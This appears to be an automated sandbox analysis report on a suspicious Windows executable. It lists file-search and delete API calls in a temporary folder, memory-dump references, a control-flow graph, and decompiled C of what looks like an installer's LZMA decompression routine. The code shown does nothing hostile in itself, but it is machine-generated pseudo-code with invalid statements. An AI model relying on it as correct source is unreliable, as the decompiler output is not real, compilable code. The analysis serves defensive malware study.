                          • DeleteFileW.KERNELBASE(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb1FEC.tmp\*.*,\*.*), ref: 00405C84
                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405CA7
                          • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsb1FEC.tmp\*.*,?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
                          • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsb1FEC.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsb1FEC.tmp\*.*,?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
                          • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
                          • FindClose.KERNELBASE(00000000), ref: 00405D6C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                          • String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsb1FEC.tmp\*.*$\*.*
                          • API String ID: 2035342205-3072410297
                          • Opcode ID: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
                          • Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
                          • Opcode Fuzzy Hash: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
                          • Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 601 406bfe-406c03 602 406c74-406c92 601->602 603 406c05-406c34 601->603 604 40726a-40727f 602->604 605 406c36-406c39 603->605 606 406c3b-406c3f 603->606 610 407281-407297 604->610 611 407299-4072af 604->611 607 406c4b-406c4e 605->607 608 406c41-406c45 606->608 609 406c47 606->609 612 406c50-406c59 607->612 613 406c6c-406c6f 607->613 608->607 609->607 614 4072b2-4072b9 610->614 611->614 617 406c5b 612->617 618 406c5e-406c6a 612->618 619 406e41-406e5f 613->619 615 4072e0-4072ec 614->615 616 4072bb-4072bf 614->616 627 406a82-406a8b 615->627 620 4072c5-4072dd 616->620 621 40746e-407478 616->621 617->618 623 406cd4-406d02 618->623 624 406e61-406e75 619->624 625 406e77-406e89 619->625 620->615 626 407484-407497 621->626 628 406d04-406d1c 623->628 629 406d1e-406d38 623->629 630 406e8c-406e96 624->630 625->630 633 40749c-4074a0 626->633 635 406a91 627->635 636 407499 627->636 634 406d3b-406d45 628->634 629->634 631 406e98 630->631 632 406e39-406e3f 630->632 637 406e14-406e18 631->637 638 406fa9-406fb6 631->638 632->619 639 406ddd-406de7 632->639 640 406d4b 634->640 641 406cbc-406cc2 634->641 642 406a98-406a9c 635->642 643 406bd8-406bf9 635->643 644 406b3d-406b41 635->644 645 406bad-406bb1 635->645 636->633 654 407420-40742a 637->654 655 406e1e-406e36 637->655 638->627 648 40742c-407436 639->648 649 406ded-406e0f 639->649 662 406ca1-406cb9 640->662 663 407408-407412 640->663 650 406d75-406d7b 641->650 651 406cc8-406cce 641->651 642->626 657 406aa2-406aaf 642->657 643->604 652 406b47-406b60 644->652 653 4073ed-4073f7 644->653 646 406bb7-406bcb 645->646 647 4073fc-407406 645->647 661 406bce-406bd6 646->661 647->626 648->626 649->638 659 406dd9 650->659 660 406d7d-406d9b 650->660 651->623 651->659 664 406b63-406b67 652->664 653->626 654->626 655->632 657->636 658 406ab5-406afb 657->658 665 406b23-406b25 658->665 666 406afd-406b01 658->666 659->639 667 406db3-406dc5 660->667 668 406d9d-406db1 660->668 661->643 661->645 662->641 663->626 664->644 669 406b69-406b6f 664->669 673 406b33-406b3b 665->673 674 406b27-406b31 665->674 670 406b03-406b06 GlobalFree 666->670 671 406b0c-406b1a GlobalAlloc 666->671 672 406dc8-406dd2 667->672 668->672 675 406b71-406b78 669->675 676 406b99-406bab 669->676 670->671 671->636 677 406b20 671->677 672->650 678 406dd4 672->678 673->664 674->673 674->674 679 406b83-406b93 GlobalAlloc 675->679 680 406b7a-406b7d GlobalFree 675->680 676->661 677->665 682 407414-40741e 678->682 683 406d5a-406d72 678->683 679->636 679->676 680->679 682->626 683->650
                          C-Code - Quality: 98%
                          			E00406BFE() {
                          				unsigned short _t531;
                          				signed int _t532;
                          				void _t533;
                          				void* _t534;
                          				signed int _t535;
                          				signed int _t565;
                          				signed int _t568;
                          				signed int _t590;
                          				signed int* _t607;
                          				void* _t614;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t614 - 0x40) != 0) {
                          						 *(_t614 - 0x34) = 1;
                          						 *(_t614 - 0x84) = 7;
                          						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                          						L132:
                          						 *(_t614 - 0x54) = _t607;
                          						L133:
                          						_t531 =  *_t607;
                          						_t590 = _t531 & 0x0000ffff;
                          						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                          						if( *(_t614 - 0xc) >= _t565) {
                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                          							 *(_t614 - 0x40) = 1;
                          							_t532 = _t531 - (_t531 >> 5);
                          							 *_t607 = _t532;
                          						} else {
                          							 *(_t614 - 0x10) = _t565;
                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                          							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                          						}
                          						if( *(_t614 - 0x10) >= 0x1000000) {
                          							L139:
                          							_t533 =  *(_t614 - 0x84);
                          							L140:
                          							 *(_t614 - 0x88) = _t533;
                          							goto L1;
                          						} else {
                          							L137:
                          							if( *(_t614 - 0x6c) == 0) {
                          								 *(_t614 - 0x88) = 5;
                          								goto L170;
                          							}
                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                          							goto L139;
                          						}
                          					} else {
                          						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          						__esi =  *(__ebp - 0x60);
                          						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          						__ecx =  *(__ebp - 0x3c);
                          						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          						__ecx =  *(__ebp - 4);
                          						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          						if( *(__ebp - 0x38) >= 4) {
                          							if( *(__ebp - 0x38) >= 0xa) {
                          								_t97 = __ebp - 0x38;
                          								 *_t97 =  *(__ebp - 0x38) - 6;
                          							} else {
                          								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          							}
                          						} else {
                          							 *(__ebp - 0x38) = 0;
                          						}
                          						if( *(__ebp - 0x34) == __edx) {
                          							__ebx = 0;
                          							__ebx = 1;
                          							L60:
                          							__eax =  *(__ebp - 0x58);
                          							__edx = __ebx + __ebx;
                          							__ecx =  *(__ebp - 0x10);
                          							__esi = __edx + __eax;
                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                          							__ax =  *__esi;
                          							 *(__ebp - 0x54) = __esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								_t216 = __edx + 1; // 0x1
                          								__ebx = _t216;
                          								__cx = __ax >> 5;
                          								 *__esi = __ax;
                          							} else {
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							 *(__ebp - 0x44) = __ebx;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								L59:
                          								if(__ebx >= 0x100) {
                          									goto L54;
                          								}
                          								goto L60;
                          							} else {
                          								L57:
                          								if( *(__ebp - 0x6c) == 0) {
                          									 *(__ebp - 0x88) = 0xf;
                          									goto L170;
                          								}
                          								__ecx =  *(__ebp - 0x70);
                          								__eax =  *(__ebp - 0xc);
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          								_t202 = __ebp - 0x70;
                          								 *_t202 =  *(__ebp - 0x70) + 1;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          								goto L59;
                          							}
                          						} else {
                          							__eax =  *(__ebp - 0x14);
                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          							if(__eax >=  *(__ebp - 0x74)) {
                          								__eax = __eax +  *(__ebp - 0x74);
                          							}
                          							__ecx =  *(__ebp - 8);
                          							__ebx = 0;
                          							__ebx = 1;
                          							__al =  *((intOrPtr*)(__eax + __ecx));
                          							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          							L40:
                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          							__ecx =  *(__ebp - 0x58);
                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          							 *(__ebp - 0x48) = __eax;
                          							__eax = __eax + 1;
                          							__eax = __eax << 8;
                          							__eax = __eax + __ebx;
                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          							__ax =  *__esi;
                          							 *(__ebp - 0x54) = __esi;
                          							__edx = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								 *(__ebp - 0x40) = 1;
                          								__cx = __ax >> 5;
                          								__ebx = __ebx + __ebx + 1;
                          								 *__esi = __ax;
                          							} else {
                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edx;
                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							 *(__ebp - 0x44) = __ebx;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								L38:
                          								__eax =  *(__ebp - 0x40);
                          								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          									while(1) {
                          										if(__ebx >= 0x100) {
                          											break;
                          										}
                          										__eax =  *(__ebp - 0x58);
                          										__edx = __ebx + __ebx;
                          										__ecx =  *(__ebp - 0x10);
                          										__esi = __edx + __eax;
                          										__ecx =  *(__ebp - 0x10) >> 0xb;
                          										__ax =  *__esi;
                          										 *(__ebp - 0x54) = __esi;
                          										__edi = __ax & 0x0000ffff;
                          										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          										if( *(__ebp - 0xc) >= __ecx) {
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          											__cx = __ax;
                          											_t169 = __edx + 1; // 0x1
                          											__ebx = _t169;
                          											__cx = __ax >> 5;
                          											 *__esi = __ax;
                          										} else {
                          											 *(__ebp - 0x10) = __ecx;
                          											0x800 = 0x800 - __edi;
                          											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          											__ebx = __ebx + __ebx;
                          											 *__esi = __cx;
                          										}
                          										 *(__ebp - 0x44) = __ebx;
                          										if( *(__ebp - 0x10) < 0x1000000) {
                          											L45:
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xe;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t155 = __ebp - 0x70;
                          											 *_t155 =  *(__ebp - 0x70) + 1;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          										}
                          									}
                          									L53:
                          									_t172 = __ebp - 0x34;
                          									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                          									L54:
                          									__al =  *(__ebp - 0x44);
                          									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          									L55:
                          									if( *(__ebp - 0x64) == 0) {
                          										 *(__ebp - 0x88) = 0x1a;
                          										goto L170;
                          									}
                          									__ecx =  *(__ebp - 0x68);
                          									__al =  *(__ebp - 0x5c);
                          									__edx =  *(__ebp - 8);
                          									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          									 *( *(__ebp - 0x68)) = __al;
                          									__ecx =  *(__ebp - 0x14);
                          									 *(__ecx +  *(__ebp - 8)) = __al;
                          									__eax = __ecx + 1;
                          									__edx = 0;
                          									_t191 = __eax %  *(__ebp - 0x74);
                          									__eax = __eax /  *(__ebp - 0x74);
                          									__edx = _t191;
                          									L79:
                          									 *(__ebp - 0x14) = __edx;
                          									L80:
                          									 *(__ebp - 0x88) = 2;
                          									goto L1;
                          								}
                          								if(__ebx >= 0x100) {
                          									goto L53;
                          								}
                          								goto L40;
                          							} else {
                          								L36:
                          								if( *(__ebp - 0x6c) == 0) {
                          									 *(__ebp - 0x88) = 0xd;
                          									L170:
                          									_t568 = 0x22;
                          									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                          									_t535 = 0;
                          									L172:
                          									return _t535;
                          								}
                          								__ecx =  *(__ebp - 0x70);
                          								__eax =  *(__ebp - 0xc);
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          								_t121 = __ebp - 0x70;
                          								 *_t121 =  *(__ebp - 0x70) + 1;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          								goto L38;
                          							}
                          						}
                          					}
                          					L1:
                          					_t534 =  *(_t614 - 0x88);
                          					if(_t534 > 0x1c) {
                          						L171:
                          						_t535 = _t534 | 0xffffffff;
                          						goto L172;
                          					}
                          					switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
                          						case 0:
                          							if( *(_t614 - 0x6c) == 0) {
                          								goto L170;
                          							}
                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                          							_t534 =  *( *(_t614 - 0x70));
                          							if(_t534 > 0xe1) {
                          								goto L171;
                          							}
                          							_t538 = _t534 & 0x000000ff;
                          							_push(0x2d);
                          							asm("cdq");
                          							_pop(_t570);
                          							_push(9);
                          							_pop(_t571);
                          							_t610 = _t538 / _t570;
                          							_t540 = _t538 % _t570 & 0x000000ff;
                          							asm("cdq");
                          							_t605 = _t540 % _t571 & 0x000000ff;
                          							 *(_t614 - 0x3c) = _t605;
                          							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                          							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                          							_t613 = (0x300 << _t605 + _t610) + 0x736;
                          							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                          								L10:
                          								if(_t613 == 0) {
                          									L12:
                          									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                          									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                          									goto L15;
                          								} else {
                          									goto L11;
                          								}
                          								do {
                          									L11:
                          									_t613 = _t613 - 1;
                          									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                          								} while (_t613 != 0);
                          								goto L12;
                          							}
                          							if( *(_t614 - 4) != 0) {
                          								GlobalFree( *(_t614 - 4));
                          							}
                          							_t534 = GlobalAlloc(0x40, 0x600); // executed
                          							 *(_t614 - 4) = _t534;
                          							if(_t534 == 0) {
                          								goto L171;
                          							} else {
                          								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                          								goto L10;
                          							}
                          						case 1:
                          							L13:
                          							__eflags =  *(_t614 - 0x6c);
                          							if( *(_t614 - 0x6c) == 0) {
                          								 *(_t614 - 0x88) = 1;
                          								goto L170;
                          							}
                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                          							_t45 = _t614 - 0x48;
                          							 *_t45 =  *(_t614 - 0x48) + 1;
                          							__eflags =  *_t45;
                          							L15:
                          							if( *(_t614 - 0x48) < 4) {
                          								goto L13;
                          							}
                          							_t546 =  *(_t614 - 0x40);
                          							if(_t546 ==  *(_t614 - 0x74)) {
                          								L20:
                          								 *(_t614 - 0x48) = 5;
                          								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                          								goto L23;
                          							}
                          							 *(_t614 - 0x74) = _t546;
                          							if( *(_t614 - 8) != 0) {
                          								GlobalFree( *(_t614 - 8)); // executed
                          							}
                          							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                          							 *(_t614 - 8) = _t534;
                          							if(_t534 == 0) {
                          								goto L171;
                          							} else {
                          								goto L20;
                          							}
                          						case 2:
                          							L24:
                          							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                          							 *(_t614 - 0x84) = 6;
                          							 *(_t614 - 0x4c) = _t553;
                          							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                          							goto L132;
                          						case 3:
                          							L21:
                          							__eflags =  *(_t614 - 0x6c);
                          							if( *(_t614 - 0x6c) == 0) {
                          								 *(_t614 - 0x88) = 3;
                          								goto L170;
                          							}
                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                          							_t67 = _t614 - 0x70;
                          							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                          							__eflags =  *_t67;
                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                          							L23:
                          							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                          							if( *(_t614 - 0x48) != 0) {
                          								goto L21;
                          							}
                          							goto L24;
                          						case 4:
                          							goto L133;
                          						case 5:
                          							goto L137;
                          						case 6:
                          							goto L0;
                          						case 7:
                          							__eflags =  *(__ebp - 0x40) - 1;
                          							if( *(__ebp - 0x40) != 1) {
                          								__eax =  *(__ebp - 0x24);
                          								 *(__ebp - 0x80) = 0x16;
                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          								__eax =  *(__ebp - 0x28);
                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          								__eax =  *(__ebp - 0x2c);
                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          								__eax = 0;
                          								__eflags =  *(__ebp - 0x38) - 7;
                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          								__al = __al & 0x000000fd;
                          								__eax = (__eflags >= 0) - 1 + 0xa;
                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          								__eax =  *(__ebp - 4);
                          								__eax =  *(__ebp - 4) + 0x664;
                          								__eflags = __eax;
                          								 *(__ebp - 0x58) = __eax;
                          								goto L68;
                          							}
                          							__eax =  *(__ebp - 4);
                          							__ecx =  *(__ebp - 0x38);
                          							 *(__ebp - 0x84) = 8;
                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          							goto L132;
                          						case 8:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x84) = 0xa;
                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          							} else {
                          								__eax =  *(__ebp - 0x38);
                          								__ecx =  *(__ebp - 4);
                          								__eax =  *(__ebp - 0x38) + 0xf;
                          								 *(__ebp - 0x84) = 9;
                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          							}
                          							goto L132;
                          						case 9:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								goto L89;
                          							}
                          							__eflags =  *(__ebp - 0x60);
                          							if( *(__ebp - 0x60) == 0) {
                          								goto L171;
                          							}
                          							__eax = 0;
                          							__eflags =  *(__ebp - 0x38) - 7;
                          							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                          							__eflags = _t258;
                          							0 | _t258 = _t258 + _t258 + 9;
                          							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                          							goto L75;
                          						case 0xa:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x84) = 0xb;
                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x28);
                          							goto L88;
                          						case 0xb:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__ecx =  *(__ebp - 0x24);
                          								__eax =  *(__ebp - 0x20);
                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          							} else {
                          								__eax =  *(__ebp - 0x24);
                          							}
                          							__ecx =  *(__ebp - 0x28);
                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          							L88:
                          							__ecx =  *(__ebp - 0x2c);
                          							 *(__ebp - 0x2c) = __eax;
                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          							L89:
                          							__eax =  *(__ebp - 4);
                          							 *(__ebp - 0x80) = 0x15;
                          							__eax =  *(__ebp - 4) + 0xa68;
                          							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          							goto L68;
                          						case 0xc:
                          							L99:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xc;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t334 = __ebp - 0x70;
                          							 *_t334 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t334;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							__eax =  *(__ebp - 0x2c);
                          							goto L101;
                          						case 0xd:
                          							goto L36;
                          						case 0xe:
                          							goto L45;
                          						case 0xf:
                          							goto L57;
                          						case 0x10:
                          							L109:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0x10;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t365 = __ebp - 0x70;
                          							 *_t365 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t365;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							goto L111;
                          						case 0x11:
                          							L68:
                          							__esi =  *(__ebp - 0x58);
                          							 *(__ebp - 0x84) = 0x12;
                          							goto L132;
                          						case 0x12:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 0x58);
                          								 *(__ebp - 0x84) = 0x13;
                          								__esi =  *(__ebp - 0x58) + 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x4c);
                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          							__ecx =  *(__ebp - 0x58);
                          							__eax =  *(__ebp - 0x4c) << 4;
                          							__eflags = __eax;
                          							__eax =  *(__ebp - 0x58) + __eax + 4;
                          							goto L130;
                          						case 0x13:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								_t469 = __ebp - 0x58;
                          								 *_t469 =  *(__ebp - 0x58) + 0x204;
                          								__eflags =  *_t469;
                          								 *(__ebp - 0x30) = 0x10;
                          								 *(__ebp - 0x40) = 8;
                          								L144:
